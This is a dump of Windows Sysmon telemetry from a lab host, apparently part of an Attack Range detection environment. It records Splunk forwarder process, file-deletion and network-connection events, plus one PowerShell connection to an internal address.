AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035342012Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:31.373{B81B27B7-725B-613B-24B4-03000000C801}64405608C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342011Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:31.220{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-725B-613B-24B4-03000000C801}6440C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035342010Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:31.220{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=526EFD4F15C776A8B9F0282F879F1AA5,SHA256=3B67D55A7CD62F73E46CDE7A10F63D54C638D7F54A49AC925C9AFFC8CA1F5674,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342009Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:31.220{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342008Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:31.220{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-725B-613B-24B4-03000000C801}6440C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342007Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:31.220{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342006Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:31.220{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342005Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:31.220{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342004Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:31.220{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-725B-613B-24B4-03000000C801}6440C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342003Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:31.205{B81B27B7-725B-613B-24B4-03000000C801}6440C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035342031Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:32.605{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-725C-613B-26B4-03000000C801}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342030Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:32.605{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342029Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:32.605{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342028Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:32.605{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342027Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:32.605{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342026Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:32.605{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-725C-613B-26B4-03000000C801}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342025Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:32.605{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-725C-613B-26B4-03000000C801}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342024Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:32.590{B81B27B7-725C-613B-26B4-03000000C801}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035342023Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:32.305{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D863C6B77C1F599867EFD4DFFC64E070,SHA256=F7A8DC39671721490B0EF9DEE74EB2F221568113545DD32448744D171453B23B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342022Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:32.221{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0CEDABE0713A87F69D20BBB574C8548,SHA256=105571A1271917A6E515D607857D12A908609212C18A0098A66AA33FFA2CF078,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342021Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:32.090{B81B27B7-725B-613B-25B4-03000000C801}50925940C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035342034Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:33.592{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D3A6E2C0E6295CBB6B9F59B00718F02B,SHA256=49A98472631AFFE32516BA7BEFFF2D1782B70414185345DDDDEE5382F0062649,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342033Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:33.245{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62439ED7EB8C16A9BA0840A0FF6A156A,SHA256=4E0C1F85DCD5BF4DC0555CAD9A0194D33962408C2A9450A0AECD1EE7644EB641,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342032Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:33.039{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CE09575DD33D53692FAE4A341A184C0F,SHA256=9B533A3C30193587DAF3ECF7E5D6E70CCDBC432A6B670EBAE5C91B12A96A9BF4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342039Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:59.003{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52371-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342038Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:34.260{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65FABC3F08C256D0E3C2CF4BB89CE360,SHA256=94805AF5547943FBD8B5542DADEBFDE18A23B56174BA182389FB436D4B1F26BA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342037Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:34.123{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342036Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:34.123{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342035Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:34.123{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035342041Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:01.237{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52372-false10.0.1.12-8000- 23542300x800000000000000035342040Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:35.276{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87BD9680D03D9756AEDAC52F6CAE00F7,SHA256=3D369E0C88A8D069691A73B51AD8FAA04C8FE71AA5AE2D2410710259A71ACB58,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342043Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:36.559{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF75f4fad1.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342042Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:36.291{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFD1A399480248946DBB7428AEA394BF,SHA256=34720CC2F70327D2DE6F07FF7DE8B9BDD9F003D1D668E9D15142C36A23D58BD7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342045Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:37.305{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 